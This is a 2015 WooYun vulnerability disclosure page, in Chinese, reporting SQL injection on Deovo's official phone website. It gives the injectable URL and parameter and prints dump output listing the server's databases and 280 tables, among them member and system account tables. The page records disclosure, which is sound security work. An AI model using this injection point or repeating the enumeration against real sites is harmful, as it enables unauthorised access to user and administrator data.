当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0122729

漏洞标题:手机网站安全之Deovo手机官网SQL注入漏洞

相关厂商:深圳市迪为通信有限公司

漏洞作者: 路人甲

提交时间:2015-06-25 18:14

修复时间:2015-08-09 18:16

公开时间:2015-08-09 18:16

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-06-25: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-08-09: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

RT

详细说明:

http://www.deovo.com/Attac/AttList.aspx?tid=100000025399735

available databases [7]:
[*] deovo-20120928
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb


Database: deovo-20120928
[280 tables]
+------------------------------+
| K_Advertisement |
| K_Advertisement |
| K_AdvertisementConfig |
| K_AdvertisementConfig |
| K_Advertising |
| K_Advertising |
| K_Author |
| K_Author |
| K_BrowseCount |
| K_BrowseCount |
| K_Category |
| K_Category |
| K_City |
| K_City |
| K_CollectionAddress |
| K_CollectionAddress |
| K_CollectionField |
| K_CollectionField |
| K_CollectionFieldReplace |
| K_CollectionFieldReplace |
| K_CollectionHttpHeader |
| K_CollectionHttpHeader |
| K_CollectionHttpHeaderConfig |
| K_CollectionHttpHeaderConfig |
| K_CollectionLabelVar |
| K_CollectionLabelVar |
| K_CollectionLabelVarValue |
| K_CollectionLabelVarValue |
| K_CollectionPlan |
| K_CollectionPlan |
| K_CollectionPlanLog |
| K_CollectionPlanLog |
| K_CollectionPlanTask |
| K_CollectionPlanTask |
| K_CollectionPublishTask |
| K_CollectionPublishTask |
| K_CollectionRule |
| K_CollectionRule |
| K_CollectionTask |
| K_CollectionTask |
| K_Comment |
| K_Comment |
| K_CommentConfig |
| K_CommentConfig |
| K_CustomForm |
| K_CustomForm |
| K_F_FeedBack |
| K_F_FeedBack |
| K_F_MessBox |
| K_F_MessBox |
| K_F_Recruit |
| K_F_Recruit |
| K_FlowStep |
| K_FlowStep |
| K_FriendLink |
| K_FriendLink |
| K_FriendLinkClass |
| K_FriendLinkClass |
| K_FriendLinkConfig |
| K_FriendLinkConfig |
| K_InnerEmaiType |
| K_InnerEmaiType |
| K_InnerEmail |
| K_InnerEmail |
| K_Keyword |
| K_Keyword |
| K_KeywordFilter |
| K_KeywordFilter |
| K_Member |
| K_Member |
| K_MemberConfig |
| K_MemberConfig |
| K_MemberDetail |
| K_MemberDetail |
| K_MemberEmail |
| K_MemberEmail |
| K_MemberEmailReceive |
| K_MemberEmailReceive |
| K_MemberGroup |
| K_MemberGroup |
| K_MemberScore |
| K_MemberScore |
| K_MemberVisibleSetup |
| K_MemberVisibleSetup |
| K_ModelCommonField |
| K_ModelCommonField |
| K_ModelCommonFieldGroup |
| K_ModelCommonFieldGroup |
| K_ModelField |
| K_ModelField |
| K_ModelFieldGroup |
| K_ModelFieldGroup |
| K_ModelManage |
| K_ModelManage |
| K_RecommendArea |
| K_RecommendArea |
| K_RecommendAreaPosition |
| K_RecommendAreaPosition |
| K_RecyclingAssociated |
| K_RecyclingAssociated |
| K_RecyclingManage |
| K_RecyclingManage |
| K_ReviewFlow |
| K_ReviewFlow |
| K_ReviewFlowLog |
| K_ReviewFlowLog |
| K_ReviewFlowState |
| K_ReviewFlowState |
| K_S_SurveyRecord32 |
| K_S_SurveyRecord32 |
| K_ServerMachine |
| K_ServerMachine |
| K_SinglePage |
| K_SinglePage |
| K_Source |
| K_Source |
| K_Special |
| K_Special |
| K_SpecialInfo |
| K_SpecialInfo |
| K_SpecialMenu |
| K_SpecialMenu |
| K_SpecialRecommendInfo |
| K_SpecialRecommendInfo |
| K_SubModelGroup |
| K_SubModelGroup |
| K_Survey |
| K_Survey |
| K_SurveyItem |
| K_SurveyItem |
| K_SurveyVote |
| K_SurveyVote |
| K_SysAccount |
| K_SysAccount |
| K_SysAccountPermit |
| K_SysAccountPermit |
| K_SysAccountSite |
| K_SysAccountSite |
| K_SysActionPermit |
| K_SysActionPermit |
| K_SysLog |
| K_SysLog |
| K_SysMessage |
| K_SysMessage |
| K_SysMessageSendee |
| K_SysMessageSendee |
| K_SysModule |
| K_SysModule |
| K_SysModuleNode |
| K_SysModuleNode |
| K_SysPublicOper |
| K_SysPublicOper |
| K_SysRole |
| K_SysRole |
| K_SysRolePermit |
| K_SysRolePermit |
| K_SysTask |
| K_SysTask |
| K_SysUser |
| K_SysUser |
| K_SysUserGroup |
| K_SysUserGroup |
| K_SysUserGroupPermit |
| K_SysUserGroupPermit |
| K_SysUserGroupRole |
| K_SysUserGroupRole |
| K_SysUserRole |
| K_SysUserRole |
| K_SysWebSite |
| K_SysWebSite |
| K_T_Lable |
| K_T_Lable |
| K_T_LableClass |
| K_T_LableClass |
| K_T_LableFree |
| K_T_LableFree |
| K_TemplateProject |
| K_TemplateProject |
| K_TemplateSkin |
| K_TemplateSkin |
| K_U_AboutUs |
| K_U_AboutUs |
| K_U_AcceptJobs |
| K_U_AcceptJobs |
| K_U_Activity |
| K_U_Activity |
| K_U_Article |
| K_U_Article |
| K_U_AttCanimgs |
| K_U_AttCanimgs |
| K_U_AttModel |
| K_U_AttModel |
| K_U_AttModelCut |
| K_U_AttModelCut |
| K_U_AttModellist |
| K_U_AttModellist |
| K_U_Banner |
| K_U_Banner |
| K_U_BranchTree |
| K_U_BranchTree |
| K_U_CellPhone |
| K_U_CellPhone |
| K_U_ClassTree |
| K_U_ClassTree |
| K_U_Commend |
| K_U_Commend |
| K_U_Contact |
| K_U_Contact |
| K_U_Depart |
| K_U_Depart |
| K_U_DepartData |
| K_U_DepartData |
| K_U_DepartDownType |
| K_U_DepartDownType |
| K_U_DepartNews |
| K_U_DepartNews |
| K_U_DownLoad |
| K_U_DownLoad |
| K_U_GlobleModel |
| K_U_GlobleModel |
| K_U_Job |
| K_U_Job |
| K_U_Links |
| K_U_Links |
| K_U_Message |
| K_U_Message |
| K_U_ModelDownload |
| K_U_ModelDownload |
| K_U_News |
| K_U_News |
| K_U_NodeImage |
| K_U_NodeImage |
| K_U_OrderDate |
| K_U_OrderDate |
| K_U_Parameter |
| K_U_Parameter |
| K_U_Periodical |
| K_U_Periodical |
| K_U_PeriodicalArticle |
| K_U_PeriodicalArticle |
| K_U_PeriodicalCatalog |
| K_U_PeriodicalCatalog |
| K_U_ProAbout |
| K_U_ProAbout |
| K_U_ProInfoImgs |
| K_U_ProInfoImgs |
| K_U_ProInside |
| K_U_ProInside |
| K_U_ProList |
| K_U_ProList |
| K_U_ProType |
| K_U_ProType |
| K_U_Products |
| K_U_Products |
| K_U_attPromodel |
| K_U_attPromodel |
| K_U_commType |
| K_U_commType |
| K_U_help |
| K_U_help |
| K_U_helpdatails |
| K_U_helpdatails |
| K_U_install |
| K_U_install |
| K_U_member |
| K_U_member |
| K_U_networks |
| K_U_networks |
| K_Vote |
| K_Vote |
| K_VoteItems |
| K_VoteItems |
| K_WebSiteTemplate |
| K_WebSiteTemplate |
| K_WebSiteTemplateNode |
| K_WebSiteTemplateNode |
| K_WebSiteTemplatePermit |
| K_WebSiteTemplatePermit |
| VIEW_RECYCLING |
| VIEW_RECYCLING |
+------------------------------+

漏洞证明:

综上

修复方案:

你会的

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝